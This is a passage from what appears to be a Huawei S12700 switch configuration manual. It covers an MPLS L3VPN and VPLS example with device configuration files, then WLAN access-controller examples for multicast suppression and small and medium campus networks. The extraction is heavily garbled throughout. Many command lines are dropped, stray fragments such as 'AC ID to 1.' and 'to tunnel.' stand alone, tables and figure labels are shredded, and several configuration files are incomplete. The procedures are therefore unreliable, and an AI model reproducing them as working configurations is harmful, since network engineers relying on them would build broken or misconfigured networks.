and the PE devices use VLAN 10 and VLAN 100 to identify Layer 3 services.)
# Configure PE1.
[PE1] interface gigabitethernet 1/0/0.1
[PE1-GigabitEthernet1/0/0.1] dot1q termination vid 10
[PE1-GigabitEthernet1/0/0.1] ip binding vpn-instance vpna
[PE1-GigabitEthernet1/0/0.1] ip address 10.1.1.2 24
[PE1-GigabitEthernet1/0/0.1] arp broadcast enable
[PE1-GigabitEthernet2/0/0.1] ip binding vpn-instance vpnb


# Configure PE2.
[PE2-GigabitEthernet1/0/0.1] ip binding vpn-instance vpna
[PE2-GigabitEthernet2/0/0.1] ip binding vpn-instance vpnb
# Configure CE1 connecting to the headquarters of enterprise A. Configure IP addresses for

interfaces of CE2, CE3, and CE4 according to Figure 14-7. The configurations of CE2, CE3,
and CE4 are similar to the configuration of CE1, and are not mentioned here.
[CE1] vlan batch 10 to 11
[CE1-GigabitEthernet1/0/0] port hybrid tagged vlan 10 to 11
[CE1-Vlanif10] quit
PE1 and PE2 to view VPN instance configuration. The PE devices can ping local CE devices
attached to them.
NOTE
If a PE device has multiple interfaces bound to the same VPN instance, you need to specify a source IP
address when pinging the CE device connected to the remote PE device. To specify the source IP
address, set the -a source-ip-address parameter in the ping -vpn-instance vpn-instance-name -a source-
ip-address dest-ip-address command. If no source IP address is specified, the ping operation fails.
Take the ping test from PE1 to CE1 as an example:

[PE1] display ip vpn-instance verbose
Total VPN-Instances configured : 2
VPN-Instance Name and ID : vpna, 1

Address family ipv4
Create date : 2012/07/25 00:58:17 UTC+08:00
Log Interval : 5
VPN-Instance Name and ID : vpnb, 2

Address family ipv4
Create date : 2012/07/25 00:58:17 UTC+08:00
Log Interval : 5
[PE1] ping -vpn-instance vpnb 10.2.1.1

0.00% packet loss
Step 4 Create VPLS VSI instances on PE1 and PE2. In each VSI instance, specify BGP as the
signaling protocol, and set the RD, VPN target and site. Bind sub-interfaces to VSI instances
so that the sub-interfaces function as AC interfaces to provide access for VPLS users.
Configure dot1q termination sub-interfaces for single-tagged packets sent from CE1 and CE3.
Configure QinQ termination sub-interfaces for double-tagged packets sent from CE2 and
CE4. (The CE devices use VLAN 11 and VLAN 21 to identify Layer 2 service users, and the
PE devices use VLAN 11 and VLAN 200 to identify Layer 2 services.)
# Configure PE1.
[PE1] mpls l2vpn
[PE1-l2vpn] quit
[PE1] vsi vsi1 auto
[PE1-vsi-vsi1] pwsignal bgp
[PE1-vsi-vsi1-bgp] route-distinguisher 101:1
[PE1-vsi-vsi1-bgp] vpn-target 100:1 import-extcommunity
[PE1-vsi-vsi1-bgp] vpn-target 100:1 export-extcommunity
[PE1-vsi-vsi1-bgp] site 1 range 5 default-offset 0
[PE1-vsi-vsi1-bgp] quit
[PE1-vsi-vsi1] quit
[PE1] vsi vsi2 auto
[PE1-vsi-vsi2] quit
[PE1-GigabitEthernet1/0/0.2] l2 binding vsi vsi1


# Configure PE2.
[PE2] mpls l2vpn
[PE2-l2vpn] quit
[PE2] vsi vsi1 auto
[PE2-vsi-vsi1] quit
[PE2] vsi vsi2 auto
[PE2-vsi-vsi2] quit
Step 5 Set up EBGP peer relationships between the PE and CE devices and import L3VPN routes to
BGP.
# Configure CE1 connecting to the headquarters of enterprise A. The configurations of CE2,
CE3, and CE4 are similar to that of CE1, and are not mentioned here.
[CE1] bgp 65410
[CE1-bgp] quit
# Configure PE1. The configuration of PE2 is similar to that of PE1, and is not mentioned
here.
[PE1] bgp 100
[PE1-bgp-vpna] quit
[PE1-bgp-vpnb] quit
[PE1-bgp]quit
After the configuration is complete, run the display bgp vpnv4 vpn-instance peer command
on the PE devices. You can view that BGP peer relationships between PE and CE devices
have been established and are in the Established state.
Take the BGP peer relationship between PE1 and CE1 as an example:
[PE1] display bgp vpnv4 vpn-instance vpna peer



PrefRcv
10.1.1.1 4 65410 11 9 0 00:07:25 Established

1
Step 6 Set up an MP-IBGP peer relationship between PE1 and PE2.
# Configure PE1.
[PE1] bgp 100
[PE1-bgp] vpls-family
[PE1-bgp-af-vpls] peer 3.3.3.9 enable
[PE1-bgp-af-vpls] quit
[PE1-bgp] quit
# Configure PE2.
[PE2] bgp 100
[PE2-bgp] vpls-family
[PE2-bgp-af-vpls] peer 1.1.1.9 enable
[PE2-bgp-af-vpls] quit
[PE2-bgp] quit
Step 7 Configure selective QinQ on CE-side interfaces of the switches and specify the VLANs
allowed by the interfaces.
[Switch1] vlan batch 100 200
[Switch1-GigabitEthernet2/0/0] port hybrid tagged vlan 100 200
[Switch1-GigabitEthernet1/0/0] port hybrid untagged vlan 100 200
[Switch1-GigabitEthernet1/0/0] port vlan-stacking vlan 20 stack-vlan 100
[Switch2] vlan batch 100 200
[Switch2-GigabitEthernet2/0/0] port hybrid tagged vlan 100 200
[Switch2-GigabitEthernet1/0/0] port hybrid untagged vlan 100 200



Run the display ip routing-table vpn-instance command on PE1 and PE2 to view the
L3VPN routes to the remote CE devices.
------------------------------------------------------------------------------

10.1.1.0/24 Direct 0 0 D 10.1.1.2 Vlanif10
10.1.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.3.1.0/24 IBGP 255 0 RD 3.3.3.9 Vlanif30
[PE1] display ip routing-table vpn-instance vpnb
------------------------------------------------------------------------------
Routing Tables: vpnb

10.2.1.0/24 Direct 0 0 D 10.2.1.2 Vlanif20
10.2.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif20
10.4.1.0/24 IBGP 255 0 RD 3.3.3.9 Vlanif30
CE devices in the same VPN instance can successfully ping each other, whereas CE devices
in different VPN instances cannot.
For example, CE1 connecting to the headquarters of enterprise A can successfully ping CE3
connecting to a branch at 10.3.1.1 but cannot ping CE4 connecting to the headquarters of
enterprise B at 10.4.1.1.
[CE1] ping 10.3.1.1
0.00% packet loss
[CE1] ping 10.4.1.1
Request time out
Request time out
Request time out
Request time out
Request time out
100.00% packet loss
Run the display vsi name vsi2 verbose command on PE1, and you can view that vsi2 has a
PW to PE2 and is in Up state.
[PE1] display vsi name vsi2 verbose

***VSI Name : vsi2

Administrator VSI : no
Isolate Spoken : disable
VSI Index : 1
PW Signaling : bgp
Member Discovery Style : auto
PW MAC Learn Style : unqualify
Encapsulation Type : vlan
MTU : 1500
Diffserv Mode : uniform
Mpls Exp : --
DomainId : 255
Domain Name :
Ignore AcState : disable
P2P VSI : disable
Create Time : 0 days, 0 hours, 22 minutes, 6 seconds
VSI State : up
BGP RD : 101:2
SiteID/Range/Offset : 1/5/0
Import vpn target : 200:1
Export vpn target : 200:1
Remote Label Block : 35845/5/0
Local Label Block : 0/35845/5/0
Interface Name : GigabitEthernet2/0/0.2

State : up
Access Port : false
Last Up Time : 2012/12/24 21:19:48
Total Up Time : 0 days, 0 hours, 20 minutes, 42 seconds
**PW Information:
*Peer Ip Address : 3.3.3.9

PW State : up
Local VC Label : 35847
Remote VC Label : 35846
PW Type : label
Local VCCV : alert lsp-ping bfd
Remote VCCV : alert lsp-ping bfd
Tunnel ID : 0x5
Broadcast Tunnel ID : 0x5
Broad BackupTunnel ID : 0x0
Ckey : 0xc
Nkey : 0xb
Main PW Token : 0x5
Slave PW Token : 0x0
Tnl Type : LSP
OutInterface : Vlanif30
Backup OutInterface :
Stp Enable : 0
PW Last Up Time : 2012/12/24 21:38:43
PW Total Up Time : 0 days, 0 hours, 1 minutes, 47 seconds
----End
Configuration Files
#
sysname PE1
#
vlan batch 30
#
ipv4-family


#
ipv4-family
#
mpls lsr-id 1.1.1.9
mpls
#
mpls l2vpn
#
vsi vsi1 auto
pwsignal bgp
site 1 range 5 default-offset 0
#
vsi vsi2 auto
pwsignal bgp
#
mpls ldp
#
interface Vlanif30
ip address 172.1.1.1 255.255.255.0
mpls
mpls ldp
#
#
ip address 10.1.1.2 255.255.255.0
#
l2 binding vsi vsi1
#
#
ip address 10.2.1.2 255.255.255.0
#
l2 binding vsi vsi2
#
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bgp 100


#
ipv4-family unicast
peer 3.3.3.9 enable
#
vpls-family
policy vpn-target
peer 3.3.3.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.9 enable
#
import-route direct
#
import-route direct
#
ospf 1
area 0.0.0.0
network 172.1.1.0 0.0.0.255
network 1.1.1.9 0.0.0.0
#
return
l Configuration file of the P device

#
sysname P
#
vlan batch 30 60
#
mpls lsr-id 2.2.2.9
mpls
#
mpls ldp
#
interface Vlanif30
ip address 172.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif60
ip address 172.2.1.1 255.255.255.0
mpls
mpls ldp
#
#
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
ospf 1
area 0.0.0.0
network 172.1.1.0 0.0.0.255
network 172.2.1.0 0.0.0.255
network 2.2.2.9 0.0.0.0

#
return
#
sysname PE2
#
vlan batch 60
#
ipv4-family
#
ipv4-family
#
mpls lsr-id 3.3.3.9
mpls
#
mpls l2vpn
#
vsi vsi1 auto
pwsignal bgp
#
vsi vsi2 auto
pwsignal bgp
#
mpls ldp
#
interface Vlanif60
ip address 172.2.1.2 255.255.255.0
mpls
mpls ldp
#
#
ip address 10.3.1.2 255.255.255.0
#
l2 binding vsi vsi1
#
#
ip address 10.4.1.2 255.255.255.0
#


l2 binding vsi vsi2
#
#
interface LoopBack1
ip address 3.3.3.9 255.255.255.255
#
bgp 100
#
ipv4-family unicast
peer 1.1.1.9 enable
#
vpls-family
policy vpn-target
peer 1.1.1.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.9 enable
#
import-route direct
#
import-route direct
#
ospf 1
area 0.0.0.0
network 172.2.1.0 0.0.0.255
network 3.3.3.9 0.0.0.0
#
return
l Configuration file of CE1 connecting to the headquarters of enterprise A
#
sysname CE1
#
vlan batch 10 to 11
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
#
bgp 65410
#
ipv4-family unicast
import-route direct
#
return
l Configuration file of CE2 connecting to the headquarters of enterprise B
#
sysname CE2
#
vlan batch 20 to 21

#
interface Vlanif20
ip address 10.2.1.1 255.255.255.0
#
#
bgp 65420
#
ipv4-family unicast
import-route direct
#
return
l Configuration file of CE3 connecting to a branch of enterprise A
#
sysname CE3
#
vlan batch 10 to 11
#
interface Vlanif10
ip address 10.3.1.1 255.255.255.0
#
#
bgp 65430
#
ipv4-family unicast
import-route direct
#
return
l Configuration file of CE4 connecting to a branch of enterprise B
#
sysname CE4
#
vlan batch 20 to 21
#
interface Vlanif20
ip address 10.4.1.1 255.255.255.0
#
#
bgp 65440
#
ipv4-family unicast
import-route direct
#
return
#
sysname Switch1
#
vlan batch 100 200
#

#
#
return

#
sysname Switch2
#
vlan batch 100 200
#
#
#
return

S12700 Series Agile Switches 15 Typical WLAN-AC Configuration (Applicable to
Typical Configuration Examples Versions V200R005 to V200R008)
15 Typical WLAN-AC Configuration

(Applicable to Versions V200R005 to V200R008)
About This Chapter
15.1 Common Misconfigurations

15.2 Example for Configuring WLAN Services on a Small-Scale Network
15.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus
Networks
15.4 Example for Configuring Unified Access for Wired and Wireless Users
15.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass
Deployment, Portal Authentication)
15.6 Example for Configuring MAC Address Authentication on the Wireless Side
15.7 Example for Configuring Portal Authentication on the Wireless Side
15.8 Configuring Radio Calibration
15.9 Configuring WLAN Roaming
15.10 Example for Configuring the WLAN Service Using WDS Technology
15.11 Example for Configuring the WLAN Service Using Mesh Technology

15.1.1 Multicast Packet Suppression Is Not Configured, and A

Large Number of Low-Rate Multicast Packets Affect the Wireless
Network
Symptom
No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets, they
are usually sent at low rates. If a large number of such multicast packets are sent from the
network side, the air interfaces may be congested. You are advised to configure multicast
packet suppression to reduce impact of a large number of low-rate multicast packets on the
wireless network. Exercise caution when configuring the rate limit; otherwise, the multicast
services may be affected.
l In direct forwarding mode, you are advised to configure multicast packet suppression on
switch interfaces connected to APs.
l In tunnel forwarding mode, you are advised to configure multicast packet suppression on
WLAN-ESS interfaces of the AC.
Procedure
l Configure multicast packet suppression in direct forwarding mode.
a. Create the traffic classifier test and define a matching rule.
[SwitchA] traffic classifier test
[SwitchA-classifier-test] if-match destination-mac 0100-5e00-0000 mac-
address-mask ffff-ff00-0000 //Match the destination MAC address of
multicast packets.
[SwitchA-classifier-test] quit
b. Create the traffic behavior test, enable traffic statistics collection, and set the traffic
rate limit.
[SwitchA] traffic behavior test
[SwitchA-behavior-test] statistic enable
[SwitchA-behavior-test] car cir 100 //Set the rate limit to 100
kbit/s. If multicast services are available, you are advised to set the
rate limit according to the service traffic.
[SwitchA-behavior-test] quit
c. Create the traffic policy test and bind the traffic classifier and traffic behavior to the
traffic policy.
[SwitchA] traffic policy test
[SwitchA-trafficpolicy-test] classifier test behavior test
[SwitchA-trafficpolicy-test] quit
d. Apply the traffic policy to inbound or outbound directions of interfaces.

[SwitchA-GigabitEthernet0/0/1] traffic-policy test inbound
[SwitchA-GigabitEthernet0/0/1] traffic-policy test outbound

l Configure multicast packet suppression in tunnel forwarding mode.

a. Create the traffic profile test and set the maximum traffic volume of multicast
packets in the profile.
[HUAWEI] sysname AC
[AC] wlan
[AC-wlan-view] traffic-profile name test
[AC-wlan-traffic-prof-test] traffic-optimize multicast-suppression
packets 100 //Set the maximum traffic volume of multicast packets to
100 pps. If multicast services are available, you are advised to set the
[AC-wlan-traffic-prof-test] quit
b. Bind the traffic profile to the VAP profile.
[AC-wlan-view] vap-profile name test
[AC-wlan-vap-prof-test] traffic-profile test
[AC-wlan-vap-prof-test] quit
----End
15.2 Example for Configuring WLAN Services on a Small-

Scale Network
Small-Scale WLAN Overview

In this document, a Wireless Local Area Network (WLAN) uses 2.4 GHz or 5 GHz radio as
transmission medium. Compared with wired networks which are expensive, inflexible, and
fixed as well as lack mobility, WLANs are widely used due to their low cost, flexibility,
scalability, and mobility.
A small-scale WLAN can be a small campus network independently deployed for a small- or
medium-sized enterprise, or a branch network. A small-scale WLAN requires only a few
network devices to serve a small range of users.
Configuration Notes
l In this example, the security policy is WPA2-PSK-CCMP. To ensure network security,
choose an appropriate security policy according to your network configurations.
l In the service data forwarding mode, the management VLAN and service VLAN cannot
be the same. If you set the forwarding mode to direct forwarding, you are not advised to
configure the management VLAN and service VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interface directly connects to
APs. If port isolation is not configured, many broadcast packets will be transmitted in the
VLANs or WLAN users on different APs can directly communicate at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded only when the network between the AC and APs is added to
the management VLAN and the network between the AC and upper-layer network
is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,

service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
Configuration.

are
Versi
on
V200 S12700 V200R005C00:

R005C AP2010DN, AP3010DN-AGN, AP5010DN-AGN,
00 AP5010SN-GN, AP5030DN, AP5130DN,
AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN


are
Versi
on
V200 S12700 V200R005C10:

AGN, AP7110SN-GN, AP8030DN, AP8130DN
V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
AP2030DN, AP4030DN, AP4130DN
An enterprise has a small-scale branch network. The enterprise needs to deploy WLAN
services for mobile office so that its employees can access the enterprise internal network
anywhere and anytime.
As shown in Figure 15-1, the AC connects to APs through a PoE switch, and the PoE switch
provides power for APs. The WLAN service is configured on the AC, and delivered to APs.

In te rn e t
G E 1 /0 /2
VLAN 101
AC
G E 1 /0 /1
VLAN 100
G E 0 /0 /2
VLAN 100
PoE
S w itch A
G E 0 /0 /1
VLAN 100
AP
STA STA
M anagem ent VLAN : VLAN 100

S e rvice V L A N : V L A N 1 0 1
A P re g io n ID : 1 0
Data Planning
Table 15-2 Data planning

IP address of the AC's 192.168.10.1/24 None

source interface
WMM profile Name: wmm None
Radio profile Name: radio None
Security profile l Name: security None

l Security and
authentication policy:
WPA2+PSK
l Authentication key:
huawei123
l Encryption mode: CCMP
Traffic profile Name: traffic None

Service set l Name: test None

l SSID: test
l WLAN virtual interface:
WLAN-ESS 1
l Data forwarding mode:
tunnel forwarding
DHCP server The AC functions as the None

DHCP server to assign IP
addresses to APs and STAs.
AP gateway and IP address VLANIF 100: None

pool range 192.168.10.1/24
192.168.10.2 to
192.168.10.254/24
STA gateway and IP address VLANIF 101: None

pool range 192.168.11.1/24
192.168.11.2 to
192.168.11.254/24
1. Configure the AP, AC, Switch, and upstream device to implement Layer 2
interconnection.
2. Configure the AC as a DHCP server to assign IP addresses to STAs and the AP from an
IP address pool of an interface.
3. Configure AC system parameters, including the country code, AC ID, carrier ID, and
source interface used by the AC to communicate with the AP.
4. Set the AP authentication mode and add the AP to an AP region.
5. Configure a VAP and deliver VAP parameters to the AP so that STAs can access the
WLAN.
a. Configure a WMM profile and radio profile on the AP, retain the default settings of
the WMM profile and radio profile, bind the WMM profile to the radio profile to
enable STAs to communicate with the AP.
b. Configure a WLAN-ESS interface so that radio packets can be sent to the WLAN
service module after reaching the AC.
c. Configure a security profile and traffic profile on the AP, retain the default settings
of the security profile and traffic profile, configure a service set, bind the WLAN-
ESS interface, security profile, and traffic profile to apply security policies and QoS
policies to STAs.
d. Configure a VAP and deliver VAP parameters to the AP so that STAs can access the
Internet through the WLAN.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.
# Add GE0/0/1 that connects SwitchA to the AP to management VLAN 100 and add GE0/0/2
that connects SwitchA to the AC to the same VLAN.
# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.

[HUAWEI] sysname AC
[AC] vlan batch 100 101
Step 2 Configure the AC to communicate with the upstream device.

NOTE
Configure AC uplink interfaces to transparently transmit packets of service VLANs as required and
communicate with the upstream device.
# Add AC uplink interface GE1/0/2 to service VLAN 101.

Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and the AP.
# Configure the AC as the DHCP server to allocate an IP address to the AP from the IP
address pool on VLANIF 100, and allocate IP addresses to STAs from the IP address pool on
VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC-Vlanif101] quit
Step 4 Configure AC system parameters.

[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use


[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the
AC ID to 1.
# Configure the source interface.

[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100
Step 5 Manage the AP on the AC.

# Check the AP type ID after obtaining the MAC address of the AP.
[AC-wlan-view] display ap-type all
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
# Set the AP authentication mode to MAC address authentication (default setting). Add the
AP offline based on the AP type ID. Assume that the AP type is AP6010DN-AGN, and the
MAC address of the AP is 60de-4476-e360.
[AC-wlan-view] ap id 0 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-0] quit
# Configure an AP region and add the AP to the AP region.

[AC-wlan-view] ap-region id 10 //Create AP region 10.
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 0
[AC-wlan-ap-0] region-id 10 //Add AP to region 10.
[AC-wlan-ap-0] quit
running status. The command output shows that the AP status is normal.
All AP information:
------------------------------------------------------------------------------

/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Step 6 Configure WLAN service parameters.
# Create a WMM profile named wmm.

[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit
# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit
# Create WLAN-ESS interface 1.

[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit
# Create a security profile named security.

[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2 //Configure security policy
WPA2.
[AC-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase cipher
huawei123 encryption-method ccmp //Set the encryption method to PSK+CCMP.
[AC-wlan-sec-prof-security] quit
# Create a traffic profile named traffic.

[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit
# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test //Set the SSID to test.
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of service set to
101. By default, the VLAN ID of service set is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the service forwarding mode
to tunnel.
[AC-wlan-service-set-test] quit
Step 7 Configure a VAP and deliver VAP parameters to the AP.
# Configure a VAP.
[AC-wlan-view] ap 0 radio 0
[AC-wlan-radio-0/0] radio-profile name radio //Bind the radio template to a
radio.
[AC-wlan-radio-0/0] service-set name test //Bind the service set to the radio.
[AC-wlan-radio-0/0] quit

[AC-wlan-view] commit ap 0
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y

After the configuration is complete, run the display vap ap 0 radio 0 command. The
command output shows that the VAP has been created.
[AC-wlan-view] display vap ap 0 radio 0
All VAP Information(Total-1):
SS: Service-set BP: Bridge-profile MP: Mesh-profile
----------------------------------------------------------------------
AP ID Radio ID SS ID BP ID MP ID WLAN ID BSSID Type
----------------------------------------------------------------------
0 0 1 - - 1 60DE-4476-E360 service
----------------------------------------------------------------------
Total: 1
When an STA detects the wireless network test and associates with it, the wireless PC is
allocated an IP address. You need to enter the pre-shared key to access the wireless network.
You can run the display station assoc-info command on the AC. The command output shows
that the STAs associate with the WLAN test.
[AC-wlan-view] display station assoc-info ap 0 radio 0
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
9021-55dc-3e17 0 0 1 test
------------------------------------------------------------------------------
Total stations: 1
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
return
l Configuration file of the AC

#
sysname AC
#
#
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#

interface Vlanif101
ip address 192.168.11.1 255.255.255.0
#
#
#
interface Wlan-Ess1
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 0 type-id 19 mac 60de-4476-e360 sn 210235419610CB002287
region-id 10
security-policy wpa2
wpa2 authentication-method psk pass-phrase cipher %@%@}PSoXN{buC{{i+L![@/I<|
C"%@%@ encryption-method ccmp
service-set name test id 1
forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 101
wmm-profile id 1
ap 0 radio 0
radio-profile id 1
#
return
15.3 Example for Configuring the WLAN Service on

Medium- and Large-Scale Campus Networks
Medium- and Large-Scale WLAN Overview

Medium and large campus WLANs are deployed in headquarters of large and medium
enterprises, branches of large enterprises, colleges and universities, and airports.
Configuration Notes

Configuration.


are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-2, an enterprise's AC connects to the egress gateway Router of the
campus network and connects to APs through a PoE switch. The PoE switch provides power
to APs.
The enterprise requires a WLAN with SSID test so that users can access the enterprise
internal network from anywhere at any time. The Router needs to function as a DHCP server
to assign IP addresses on 10.10.10.0/24 to users and manage users on the AC.

Figure 15-2 WLAN service configuration networking on a medium-scale network
In te rn e t
R o u te r G E 2 /0 /0
G E 1 /0 /2 V L A N IF 1 0 2
VLAN 102 1 0 .2 3 .1 0 2 .1
AC
G E 1 /0 /1
VLAN 100
G E 0 /0 /2
VLAN 100
PoE
S w itch A
G E 0 /0 /1
VLAN 100
AP
STA STA

Data Planning


source interface

l Security and
WPA2+PSK
huawei123


l SSID: test
WLAN-ESS 1
tunnel forwarding

addresses to APs, and the
router functions as the
addresses to STAs.

pool range 192.168.10.1/24
192.168.10.2 to
192.168.10.254/24
STA gateway and IP address VLANIF 101: 10.10.10.1/24 None

pool range 10.10.10.3 to
10.10.10.254/24
1. Configure the AP, AC, and upstream device to implement network interconnection.
2. Configure the AC as a DHCP server to assign an IP address to the AP from an interface
IP address pool, configure the AC as a DHCP relay agent, and configure the Router
connected to the AC to assign IP addresses to STAs.
3. Configure the WLAN service so that users can connect to the Internet through the
WLAN.
Procedure



[HUAWEI] sysname AC
[AC] vlan batch 100

# Configure VLAN 101 (service VLAN) and VLANIF 102.
[AC-Vlanif101] quit
[AC-Vlanif102] quit
# Configure a default route on the AC.

[AC] ip route-static 0.0.0.0 0.0.0.0 10.11.10.1 //Configure a default route
destined for Router.
# Add GE1/0/2 that connects the AC to the Router to VLAN 102.

Step 3 Configure the AC to assign an IP address to the AP and the Router to assign IP addresses to
STAs.
# Configure the AC to assign an IP address to the AP from an interface IP address pool.
[AC] dhcp enable
[AC-Vlanif100] quit
# Configure the AC as the DHCP relay agent and enable user entry detection on the AC.
[AC-Vlanif101] dhcp select relay //Configure the DHCP relay function.
[AC-Vlanif101] dhcp relay server-ip 10.11.10.1 //Set the DHCP server address for
DHCP relay to 10.11.10.1, which resides on Router.
[AC-Vlanif101] quit
# Configure the Router as a DHCP server to allocate IP addresses to STAs.

[Huawei] sysname Router
[Router] dhcp enable
[Router] ip pool sta //Configure the address pool to assign IP addresses to STAs.
[Router-ip-pool-sta] gateway-list 10.10.10.1
[Router-ip-pool-sta] network 10.10.10.0 mask 24
[Router-ip-pool-sta] quit
[Router] vlan batch 102
[Router] interface vlanif 102
[Router-Vlanif102] ip address 10.11.10.1 24
[Router-Vlanif102] dhcp select global //Configure a global address pool.
[Router-Vlanif102] quit

[Router] interface gigabitethernet 2/0/0

[Router-GigabitEthernet2/0/0] port link-type trunk
[Router-GigabitEthernet2/0/0] port trunk allow-pass vlan 102
[Router-GigabitEthernet2/0/0] quit
[Router] ip route-static 10.10.10.0 24 10.11.10.2 //Configure a route on the
Router destined for the network segment 10.10.10.0/24.


AC ID to 1.

[AC] wlan
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
[AC-wlan-ap-0] quit


[AC-wlan-ap-0] quit
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------

[AC-wlan-view] quit

[AC-Wlan-Ess1] quit

[AC] wlan
WPA2.

to tunnel.

# Configure a VAP.
radio.

:y
After the configuration is complete, run the display vap ap 0 radio 0 command. The
command output shows that the VAP has been created.
[AC-wlan-view] display vap ap 0 radio 0
----------------------------------------------------------------------
----------------------------------------------------------------------
0 0 1 - - 1 60DE-4476-E360 service
----------------------------------------------------------------------
Total: 1
When an STA detects the wireless network test and associates with it, the wireless PC is
allocated an IP address. You need to enter the pre-shared key to access the wireless network.
You can run the display station assoc-info command on the AC. The command output shows
that the STAs associate with the WLAN test.
[AC-wlan-view] display station assoc-info ap 0 radio 0
------------------------------------------------------------------------------
------------------------------------------------------------------------------
9021-55dc-3e17 0 0 1 test
------------------------------------------------------------------------------
Total stations: 1
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
return
l Configuration file of the Router

#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
network 10.10.10.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.11.10.1 255.255.255.0
dhcp select global
#
#
ip route-static 10.10.10.0 255.255.255.0 10.11.10.2
#
return
#
sysname AC
#
#
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 10.10.10.1 255.255.255.0
dhcp select relay
#
interface Vlanif102
ip address 10.11.10.2 255.255.255.0
#
#
#
